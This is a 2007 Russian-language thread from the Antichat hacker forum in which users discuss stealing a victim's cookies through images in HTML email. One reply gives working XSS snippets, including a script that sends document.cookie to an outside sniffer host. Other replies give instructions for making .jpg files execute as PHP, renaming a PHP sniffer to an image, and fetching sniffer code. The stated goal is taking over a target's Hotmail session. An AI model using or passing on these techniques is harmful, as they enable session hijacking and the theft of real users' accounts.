Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   E-Mail (https://forum.antichat.xyz/forumdisplay.php?f=14)
-   -   Cookie через рисунки (https://forum.antichat.xyz/showthread.php?t=35702)

Muhacir 17.03.2007 12:39

Cookie через рисунки
 
Слыхал можно cookie красть через рисунки на активных хсс.
у кого есть идеии

Srg 17.03.2007 13:01

:) Товарисчь, картинки - это не в прямом смысле, ты имеешь в виду файлы с расширением jpg которые интерпретируються сервером как php скрипт...

Таким образом - AddType application/x-httpd-php .jpg

Muhacir 17.03.2007 13:08

нет например жертве маил в хтмл формате отправим, с рисунками. а в рисунках xss на наш сниффер

Srg 17.03.2007 13:18

Ты имеешь ввиду вот это?

Примеры использования сниффера:
Простой вызов по ссылке:
<a href="http://antichat.ru/cgi-bin/s.jpg?it is test">click me</a>
Вызов как картинки:
<img src="http://antichat.ru/cgi-bin/s.jpg">
Вызов из скрипта:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

(с) old.antichat.ru

А эта "картинка" является собой пхп кодом, выполняющимся на сервере и сохраняющая кукисы жертвы

Muhacir 17.03.2007 13:55

2 ой варриант
но как закапывать коды в рисунок.
например я хочу отправить писмо по хотмаил и когда он откроет писмо куки шли на мой сниффер

Srg 17.03.2007 14:10

Для начала создаешь файл s.php в него пишешь код снифера, затем переименовываешь в s.jpg

Скачать снифер можно с http://kanick.ru, полазий по архиву и разберешься

DimOnOID 17.03.2007 14:45

статейка про это ... тут

George767 13.07.2007 10:50

.....

C!klodoL 13.07.2007 10:54

у тебя internet explorer 7, а видимо надо 6 чтобы работало

DeBugger 13.07.2007 11:13

Цитата:

Сообщение от George767
Если у кого старая версия, плиз откройте этот файлик через нее http://anopov.com/files/ntf/scr/hex/1.png

Мой IE7 открыл эту ссылку как текст такого содержания:
Код:

‰PNG  IHDRђwSЮ pHYs  љњgAMA±Ћ|ыQ“ cHRMz%ЂѓщяЂйu0к`:?o’_ЕFIDATxЪbf``0уЯiIEND®B`‚


Время: 08:55